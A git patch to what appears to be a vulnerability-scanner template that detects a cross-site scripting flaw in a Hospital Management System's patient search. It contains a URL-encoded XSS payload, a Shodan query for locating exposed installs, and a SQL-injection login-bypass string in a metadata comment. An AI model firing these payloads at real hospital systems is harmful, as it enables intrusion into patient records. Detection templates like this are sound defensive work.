From 8c672ef591bd64904084aaa66b32a8cc880663aa Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:02:02 +0530
Subject: [PATCH] Update and rename hms-xss-2.yaml to
 hospital-management-xss2.yaml

---
 ...s-2.yaml => hospital-management-xss2.yaml} | 29 ++++++++-----------
 1 file changed, 12 insertions(+), 17 deletions(-)
 rename vulnerabilities/other/{hms-xss-2.yaml => hospital-management-xss2.yaml} (66%)

diff --git a/vulnerabilities/other/hms-xss-2.yaml b/vulnerabilities/other/hospital-management-xss2.yaml
similarity index 66%
rename from vulnerabilities/other/hms-xss-2.yaml
rename to vulnerabilities/other/hospital-management-xss2.yaml
index 42b897e5b7..fbaeb204d7 100644
--- a/vulnerabilities/other/hms-xss-2.yaml
+++ b/vulnerabilities/other/hospital-management-xss2.yaml
@@ -1,4 +1,4 @@
-id: hms-xss-2
+id: hospital-management-xss2
 
 info:
   name: Hospital Management System v1.0 - Cross Site Scripting
@@ -7,10 +7,10 @@ info:
   description: |
     Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php.
   metadata:
-    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
-    shodan-query: http.html:"Hospital Management System"
     verified: true
-  tags: hms,hospital,cms,xss
+    shodan-query: http.html:"Hospital Management System"
+    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+  tags: hms,hospital,cms,xss,authenticated
 
 requests:
   - raw:
@@ -26,19 +26,14 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        searchdata=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search=
+        searchdata=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&search=
 
-    skip-variables-check: true
-    redirects: true
-    max-redirects: 2
+    req-condition: true
     cookie-reuse: true
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - '<script>alert("XSS")</script>'
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_2, "text/html")'
+          - "status_code_2 == 200"
+          - contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
+        condition: and